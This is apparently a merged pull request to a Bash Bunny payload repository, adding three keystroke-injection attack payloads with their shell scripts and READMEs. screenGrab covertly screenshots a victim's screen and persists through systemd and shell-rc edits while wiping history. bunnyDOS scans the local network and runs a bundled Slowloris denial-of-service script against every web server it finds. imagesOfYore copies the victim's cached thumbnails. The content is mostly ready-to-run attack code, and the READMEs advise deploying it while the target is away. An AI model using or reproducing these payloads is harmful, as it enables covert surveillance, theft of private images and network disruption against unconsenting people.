Merge branch 'hak5:master' into master

pull/513/head
0iphor13 2022-04-08 17:04:46 +02:00 committed by GitHub
commit f0edfaf53c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
13 changed files with 612 additions and 0 deletions

View File

@ -0,0 +1,55 @@
## About:
* Title: screenGrab
* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny.
### Features:
* Robust Payload for capturing snap shots of target's screen.
* No additional dependencies required.
* Persistent.
* Autostart payload on boot.
### Payload:
* Payload is divided into two modules:
1) Deployment: In this stage payload is deployed in targets system.
2) Exfiltration: Storing saved loot from targets system in bunny.
### Payload Script's Workflow:
* Stop storing histroy.
* Grep bunny's mount point of bunny.
* Creating hidden directory in /var/tmp/..... for obfuscation.
* Copying ffmpeg and snap shot capturing mechanism in target's system.
* Creating systemd service for persistance and triggering mechanism for autostart.
### Changes to be made:
* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Note:
* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory.
* Due to big size of binary, it is not provided in this repo.
* Craete directory name `screenGrab` in `/loot/` for storing captured images.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| switch1/payload.txt | /payloads/switch1/ |
| switch2/payload.txt | /payloads/switch2/ |
| screenGrab/ | /payloads/libray/ |
### Usage:
1. Deploy first payload during absence of target using `switch1`.
2. Execute second payload during absence of target to store captured snapshots in bunny using `switch2`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,18 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/
chmod +x /var/tmp/.system/ffmpeg
mkdir /var/tmp/.system/sysLog
cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
cp -r $mntt/payloads/library/screenGrab/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

View File

@ -0,0 +1,12 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
fi

View File

@ -0,0 +1,5 @@
while true;
do
/var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
sleep 120
done

View File

@ -0,0 +1,56 @@
# Title: screenGrab
# Description: screenGrab payload captures snap shot's of target's screen periodically.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 12000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

View File

@ -0,0 +1,43 @@
# Title: screenGrab
# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
# create directory named screenGrab in /loot/
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \&
Q ENTER
Q STRING disown \&\& exit
Q ENTER

View File

@ -0,0 +1,37 @@
## About:
* Title: bunnyDOS
* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS.
### Features:
* Auto scan Network.
* Capable for DDOS.
* Persistent.
* Autostart payload on boot.
### Payload Workflow:
* Stop storing histroy.
* Auto Mounting bunny.
* Transfering payload script.
* Executing script in background and disowning it(this helps to reduce physical access time as network can be large).
* Unmounting bunny.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| bunnyDOS/ | /payloads/libray/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,19 @@
#!/bin/bash
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}')
open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }')
mkdir /var/tmp/.system/
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/
chmod +x /var/tmp/.system/systemIO
for i in $open
do
echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler
done
chmod +x /var/tmp/.system/sysHandler
systemctl --user start libSystemIO.service
echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit

View File

@ -0,0 +1,222 @@
#!/usr/bin/env python3
import argparse
import logging
import random
import socket
import sys
import time
parser = argparse.ArgumentParser(
description="Slowloris, low bandwidth stress test tool for websites"
)
parser.add_argument("host", nargs="?", help="Host to perform stress test on")
parser.add_argument(
"-p", "--port", default=80, help="Port of webserver, usually 80", type=int
)
parser.add_argument(
"-s",
"--sockets",
default=150,
help="Number of sockets to use in the test",
type=int,
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",
action="store_true",
help="Increases logging",
)
parser.add_argument(
"-ua",
"--randuseragents",
dest="randuseragent",
action="store_true",
help="Randomizes user-agents with each request",
)
parser.add_argument(
"-x",
"--useproxy",
dest="useproxy",
action="store_true",
help="Use a SOCKS5 proxy for connecting",
)
parser.add_argument(
"--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host"
)
parser.add_argument(
"--proxy-port", default="8080", help="SOCKS5 proxy port", type=int
)
parser.add_argument(
"--https",
dest="https",
action="store_true",
help="Use HTTPS for the requests",
)
parser.add_argument(
"--sleeptime",
dest="sleeptime",
default=15,
type=int,
help="Time to sleep between each header sent.",
)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
parser.set_defaults(https=False)
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)
if not args.host:
print("Host required!")
parser.print_help()
sys.exit(1)
if args.useproxy:
# Tries to import to external "socks" library
# and monkey patches socket.socket to connect over
# the proxy by default
try:
import socks
socks.setdefaultproxy(
socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port
)
socket.socket = socks.socksocket
logging.info("Using SOCKS5 proxy for connecting...")
except ImportError:
logging.error("Socks Proxy Library Not Available!")
if args.verbose:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%d-%m-%Y %H:%M:%S",
level=logging.DEBUG,
)
else:
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%d-%m-%Y %H:%M:%S",
level=logging.INFO,
)
def send_line(self, line):
line = f"{line}\r\n"
self.send(line.encode("utf-8"))
def send_header(self, name, value):
self.send_line(f"{name}: {value}")
if args.https:
logging.info("Importing ssl module")
import ssl
setattr(ssl.SSLSocket, "send_line", send_line)
setattr(ssl.SSLSocket, "send_header", send_header)
list_of_sockets = []
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
setattr(socket.socket, "send_line", send_line)
setattr(socket.socket, "send_header", send_header)
def init_socket(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
if args.https:
ctx = ssl.create_default_context()
s = ctx.wrap_socket(s, server_hostname=args.host)
s.connect((ip, args.port))
s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
ua = user_agents[0]
if args.randuseragent:
ua = random.choice(user_agents)
s.send_header("User-Agent", ua)
s.send_header("Accept-language", "en-US,en,q=0.5")
return s
def main():
ip = args.host
socket_count = args.sockets
logging.info("Attacking %s with %s sockets.", ip, socket_count)
logging.info("Creating sockets...")
for _ in range(socket_count):
try:
logging.debug("Creating socket nr %s", _)
s = init_socket(ip)
except socket.error as e:
logging.debug(e)
break
list_of_sockets.append(s)
while True:
try:
logging.info(
"Sending keep-alive headers... Socket count: %s",
len(list_of_sockets),
)
for s in list(list_of_sockets):
try:
s.send_header("X-a", random.randint(1, 5000))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
logging.debug("Recreating socket...")
try:
s = init_socket(ip)
if s:
list_of_sockets.append(s)
except socket.error as e:
logging.debug(e)
break
logging.debug("Sleeping for %d seconds", args.sleeptime)
time.sleep(args.sleeptime)
except (KeyboardInterrupt, SystemExit):
logging.info("Stopping Slowloris")
break
if __name__ == "__main__":
main()

View File

@ -0,0 +1,51 @@
# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh \&
Q ENTER
Q STRING disown
Q ENTER
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

View File

@ -0,0 +1,38 @@
## About:
* Title: imagesOfYore
* Description: imagesOfYore payload steals every image that target ever had in his disk.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage
## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk.
### Features:
* Sotres all images(curently stored on disk and deleted too).
* Extremly fast zstd compression for transfering images.
### Payload Workflow:
* Stop storing histroy.
* Auto Mounting bunny.
* Transfering payload script.
* Executing script in background and disowning
* Unmounting bunny.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| imagesOfYore/ | /payloads/libray/ |
### Note:
* Create directory named `imagesOfYore` in `/loot/` for storing loot.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,9 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails
udisksctl unmount -b /dev/$disk
rm /tmp/script

View File

@ -0,0 +1,47 @@
# Title: imagesOfYore
# Description: imagesOfYore payload steals every image that target ever had in his disk.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script
Q ENTER
Q STRING chmod +x /tmp/script
Q ENTER
Q STRING /tmp/./script \&
Q ENTER
Q STRING disown \&\& exit
Q ENTER
LED FINISH